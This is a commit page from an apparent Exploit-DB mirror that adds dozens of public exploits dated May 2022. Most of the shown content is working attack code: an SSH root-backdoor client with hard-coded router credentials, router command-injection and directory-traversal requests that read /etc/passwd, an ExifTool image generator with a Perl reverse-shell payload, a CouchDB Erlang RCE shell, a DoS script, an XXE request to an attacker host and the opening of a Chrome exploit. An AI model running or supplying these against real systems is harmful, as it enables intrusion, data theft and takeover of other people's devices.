bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-05-12

Browse source 
42 changes to exploits/shellcodes

UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
ExifTool 12.23 - Arbitrary Code Execution
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
Akka HTTP 10.1.14 - Denial of Service
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
Bookeen Notea - Directory Traversal
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
DLINK DIR850 - Insecure Access Control
DLINK DIR850 - Open Redirect
Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
Tenda HG6 v3.3.0 - Remote Command Injection
Google Chrome 78.0.3904.70 - Remote Code Execution
PyScript - Read Remote Python Source Code
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
ImpressCMS v1.4.4 - Unrestricted File Upload
Microfinance Management System 1.0 - 'customer_number' SQLi
WebTareas 2.4 - Blind SQLi (Authenticated)
WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
e107 CMS v3.2.1 - Multiple Vulnerabilities
Anuko Time Tracker - SQLi (Authenticated)
TLR-2005KSH - Arbitrary File Upload
Explore CMS 1.0 - SQL Injection
Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)
Beehive Forum - Account Takeover
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Joomla Plugin SexyPolling 2.1.7 - SQLi
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
This commit is contained in:
Offensive Security 2022-05-12 05:01:39 +00:00
parent 004fdfd467
commit be24992411
43 changed files with 3103 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
exploits/android/remote/50897.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Bookeen Notea - Directory Traversal
# Date: December 2021
# Exploit Author: Clement MAILLIOUX
# Vendor Homepage: https://bookeen.com/
# Software Link: N/A
# Version: BK_R_1.0.5_20210608
# Tested on: Bookeen Notea (Android 8.1)
# CVE : CVE 2021-45783
# The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function.
# The vulnerability can be triggered like so :
# - Create a note or use an existing note on the device
# - rename this note ../../../../../../
# - keep touching the note until a menu appears
# - touch to select "export"
# - touch "View"
# Now you can access and explore the device filesystem.

141
exploits/hardware/remote/50894.py Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
# 1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
# OpenWrt/Linaro GCC 4.8-2014.04
# Ralink SoC MT7628 PCIe RC mode
# BusyBox v1.22.1
# uhttpd
# Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#
import paramiko as bah
import sys as baaaaaah
bnr='''
. ·
. ·
· .
. ·
· · · ·
·
··
.. ..
· · .
·
.
.. ·
· ·· ..· . ·
.· . .
· ·
'''
print(bnr)
if len(baaaaaah.argv)<2:
print('--Gief me an IP.')
exit(0)
adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'
rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
print('--Got rewt!')
except:
print('--Backdoor removed.')
exit(-1)
while True:
cmnd=input('# ')
if cmnd=='exit':
rsh.exec_command('exit')
break
stdin,stdout,stderr = rsh.exec_command(cmnd)
print(stdout.read().decode().strip())
rsh.close()

12
exploits/hardware/remote/50906.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
# Exploit :
Visit http://<IP Address>/config.dat

12
exploits/hardware/remote/50907.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
#Exploit :
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1

146
exploits/hardware/remote/50916.txt Normal file
View file

@ -0,0 +1,146 @@
# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
# Exploit Author: LiquidWorm
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability
Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
Software version: v1.1.0
Hardware Version: v1.0
Check Version: TD_HG6_XPON_TDE_ISP
Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.
Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.
Tested on: Boa/0.93.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php
22.04.2022
--
ping.asp:
---------
POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564
---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf
ping6.asp:
----------
POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp
---
boa.conf
web
tracert.asp:
------------
POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1
traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp
---
/home/httpd
tracert6.asp:
-------------
POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1
traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp
---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

20
exploits/hardware/remote/50919.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass

59
exploits/hardware/remote/50930.py Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164
#!/usr/bin/python3
import os
import sys
import time
import requests
import json
def enc(PASS):
key = "RjYkhwzx$2018!"
shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
return os.popen(shell).read().strip()
try:
TARGET = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
COMMAND = sys.argv[4]
except Exception:
print("CVE-2021-43164 PoC")
print("Usage: python3 exploit.py <target> <user> <pass> <command>")
print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
sys.exit(1)
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
"method": "login",
"params": {
"username": USER,
"password": enc(PASS),
"encry": True,
"time": int(time.time()),
"limit": False
}
}
r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
"method": "updateVersion",
"params": {
"jsonparam": "'; {} #".format(COMMAND)
}
}
r = requests.post(endpoint, json=payload)
print(r.text)

31
exploits/hardware/webapps/50931.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428
# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.
# Proof-of-Concept
# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10

141
exploits/linux/local/50911.py Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution
# Date: 04/30/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://exiftool.org/
# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
# Version: 7.44-12.23
# Tested on: ExifTool 12.23 (Debian)
# CVE: CVE-2021-22204
# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204
# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
#!/usr/bin/env python3
# Imports
import base64
import os
import subprocess
import sys
# Class for colors
class color:
red = '\033[91m'
gold = '\033[93m'
blue = '\033[36m'
green = '\033[92m'
no = '\033[0m'
# Print UNICORD ASCII Art
def UNICORD_ASCII():
print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")
# Print exploit help menu
def help():
print(r"""UNICORD Exploit for CVE-2021-22204
Usage:
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
Options:
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
""")
# Run the exploit
def exploit(command):
UNICORD_ASCII()
# Create perl payload
payload = "(metadata \"\c${"
payload += command
payload += "};\")"
print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")
print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")
# Write payload to file
payloadFile = open('payload','w')
payloadFile.write(payload)
payloadFile.close()
# Bzz compress file
subprocess.run(['bzz', 'payload', 'payload.bzz'])
# Run djvumake
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
if '-i' in sys.argv:
imagePath = sys.argv[sys.argv.index('-i') + 1]
subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])
else:
# Smallest possible JPEG
image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
# Write smallest possible JPEG image to file
with open("image.jpg", "wb") as img:
img.write(base64.decodebytes(image))
# Write exiftool config to file
config = (r"""
%Image::ExifTool::UserDefined = (
'Image::ExifTool::Exif::Main' => {
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
},
);
1; #end
""")
configFile = open('exiftool.config','w')
configFile.write(config)
configFile.close()
# Exiftool config for output image
subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])
# Delete leftover files
os.remove("payload")
os.remove("payload.bzz")
os.remove("exploit.djvu")
os.remove("exiftool.config")
# Print results
print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")
exit()
if __name__ == "__main__":
args = ['-h','-c','-s','-i']
if args[0] in sys.argv:
help()
elif args[1] in sys.argv and not args[2] in sys.argv:
exec = sys.argv[sys.argv.index(args[1]) + 1]
command = f"system(\'{exec}\')"
exploit(command)
elif args[2] in sys.argv and not args[1] in sys.argv:
localIP = sys.argv[sys.argv.index(args[2]) + 1]
localPort = sys.argv[sys.argv.index(args[2]) + 2]
command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"
exploit(command)
else:
help()

136
exploits/linux/remote/50914.py Executable file
View file

@ -0,0 +1,136 @@
# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
# Date: 2022-01-21
# Exploit Author: Konstantin Burov, @_sadshade
# Software Link: https://couchdb.apache.org/
# Version: 3.2.1 and below
# Tested on: Kali 2021.2
# Based on 1F98D's Erlang Cookie - Remote Code Execution
# Shodan: port:4369 "name couchdb at"
# CVE: CVE-2022-24706
# References:
# https://habr.com/ru/post/661195/
# https://www.exploit-db.com/exploits/49418
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
#
#
#!/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
import re
import time
TARGET = ""
EPMD_PORT = 4369 # Default Erlang distributed port
COOKIE = "monster" # Default Erlang cookie for CouchDB
ERLNAG_PORT = 0
EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
# Some data:
NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
def compile_cmd(CMD):
MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
MSG += struct.pack(">H", len(CMD))
MSG += bytes(CMD, 'ascii')
MSG += b'jw\x04user'
PAYLOAD = b'\x70' + CTRL_DATA + MSG
PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
return PAYLOAD
print("Remote Command Execution via Erlang Distribution Protocol.\n")
while not TARGET:
TARGET = input("Enter target host:\n> ")
# Connect to EPMD:
try:
epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
epm_socket.connect((TARGET, EPMD_PORT))
except socket.error as msg:
print("Couldnt connect to EPMD: %s\n terminating program" % msg)
sys.exit(1)
epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
data = epm_socket.recv(1024)
data = data[0:len(data) - 1].decode('ascii')
data = data.split("\n")
if len(data) == 1:
choise = 1
print("Found " + data[0])
else:
print("\nMore than one node found, choose which one to use:")
line_number = 0
for line in data:
line_number += 1
print(" %d) %s" %(line_number, line))
choise = int(input("\n> "))
ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
else:
print("Node list request error, exiting")
sys.exit(1)
epm_socket.close()
# Connect to Erlang port:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, ERLNAG_PORT))
except socket.error as msg:
print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
sys.exit(1)
s.send(NAME_MSG)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
#print("Extracted challenge: {}".format(challenge))
# Add Challenge Digest
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+ bytes(str(challenge), "ascii")).digest()
s.send(CHALLENGE_REPLY)
CHALLENGE_RESPONSE = s.recv(1024)
if len(CHALLENGE_RESPONSE) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
print("Enter command:\n")
data_size = 0
while True:
if data_size <= 0:
CMD = input("> ")
if not CMD:
continue
elif CMD == "exit":
sys.exit(0)
s.send(compile_cmd(CMD))
data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
s.recv(45) # Control message
data_size -= 45 # Data size without control message
time.sleep(0.1)
elif data_size < 1024:
data = s.recv(data_size)
#print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode())
data_size = 0
else:
data = s.recv(1024)
#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode(),end = '')
data_size -= 1024

57
exploits/multiple/remote/50892.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697
import argparse
import logging
import requests
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def send_benign_request(url, verify=True):
log.info(f"Sending benign request to {url} for checking reachability...")
try:
r = requests.get(url)
log.info(f"Benign request returned following status code: {r.status_code}")
return True
except Exception as e:
log.info(f"The following exception was encountered: {e}")
return False
def send_malicious_request(url, verify=True):
log.info(f"Sending malicious request to {url}")
# Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
nested_comment_payload = "("*8191
headers = {'User-Agent': nested_comment_payload}
try:
r = requests.get(url, headers=headers)
log.info(f"Request returned following status code: {r.status_code}")
# Expected exception to be returned if server is DoSed successfully
except requests.exceptions.RequestException as e:
if "Remote end closed connection without response" in str(e):
log.info(f"The server is unresponsive per {e}: DoS likely successful")
except Exception as e:
log.info(f"The following exception was encountered: {e}")
if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target URL for vulnerable Akka server (e.g. https://localhost)",
required="True", action="store")
parser.add_argument("-k", "--insecure",
help="Disable verification of SSL/TLS certificate",
action="store_false", default=True)
args = parser.parse_args()
# Send requests: first is connectivity check, second is DoS attempt
if send_benign_request(args.target, args.insecure):
send_malicious_request(args.target, args.insecure)

15
exploits/multiple/remote/50900.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long

641
exploits/multiple/remote/50917.js Normal file
View file

@ -0,0 +1,641 @@
# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution
# Date: 2022-05-03
# Exploit Author: deadlock (Forrest Orr)
# Type: RCE
# Platform: Windows
# Website: https://forrest-orr.net
# Twitter: https://twitter.com/_ForrestOrr
# Vendor Homepage: https://www.google.com/chrome/
# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip
# Versions: Chrome 76 - 78.0.3904.70
# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64
# CVE: CVE-2019-13720
# Bypasses: DEP, High Entropy ASLR, CFG, CET
# Github: https://github.com/forrest-orr/WizardOpium
<html>
<script>
/*;; --------------------------------------------------------------------- |
;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |
;;;; --------------------------------------------------------------------- |
;;;; Author: deadlock (Forrest Orr) - 2022 |
;;;; --------------------------------------------------------------------- |
;;;; Licensed under GNU GPLv3 |
;;;; --------------------------------------------------------------------- |
;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |
;;;; 64-bit with CPU core counts: |
;;;; ~ 16 cores (non-virtualized) | works |
;;;; ~ 4 cores (virtualized) | works |
;;;; ~ 2 cores (virtualized) | works |
;;;; ~ 1 core (virtualized) | fails |
;;;; |
;;;; All of these tests finished successfully with a 95%+ success rate |
;;;; with the exception of the 1 core tests, which fail with a 100% |
;;;; frequency. Due to the nature of the exploit as both a UAF highly |
;;;; sensitive to the state of the heap and a race condition, it appears |
;;;; that a single core is unable to reliably reproduce the UAF or any |
;;;; kind of consistency in the heap between executions. |
;;;; --------------------------------------------------------------------- |
;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |
;;;; --------------------------------------------------------------------- |
;;;; ## Sandboxing |
;;;; ~ Chrome uses an isolated content child proces running under a |
;;;; restricted token below Low Integrity to render JavaScript. |
;;;; ~ Child process creation is restricted via Windows exploit |
;;;; mitigation features on the OS level for Chrome renderers. |
;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |
;;;; sandbox escape (this was limited to Windows 7 since in newer |
;;;; versions of Windows win32k syscalls are locked in Chrome for |
;;;; security purposes). |
;;;; ~ Run Chrome with the "--no-sandbox" parameter in order to execute |
;;;; the WinExec shellcode within this exploit source. |
;;;; --------------------------------------------------------------------- |
;;;; ## Notes |
;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |
;;;; for both infoleaks and R/W primitives. |
;;;; ~ The exploit should in theory work in any version of Chrome up to |
;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |
;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |
;;;; initialized resulting in the creation of a single page of +RWX |
;;;; JIT memory. This is then overwritten with a 673 byte egghunter |
;;;; shellcode. |
;;;; ~ The egghunter will scan through all committed +RW regions of |
;;;; private memory within the compromised chrome.exe renderer process |
;;;; and mark any region it identifies as +RWX which contains the egg |
;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |
;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |
;;;; array prefixed by the following egg QWORD bytes: |
;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |
;;;; --------------------------------------------------------------------- |
;;;; ## Credits |
;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |
;;;; chain in the wild. |
;;;; -------------------------------------------------------------------- */
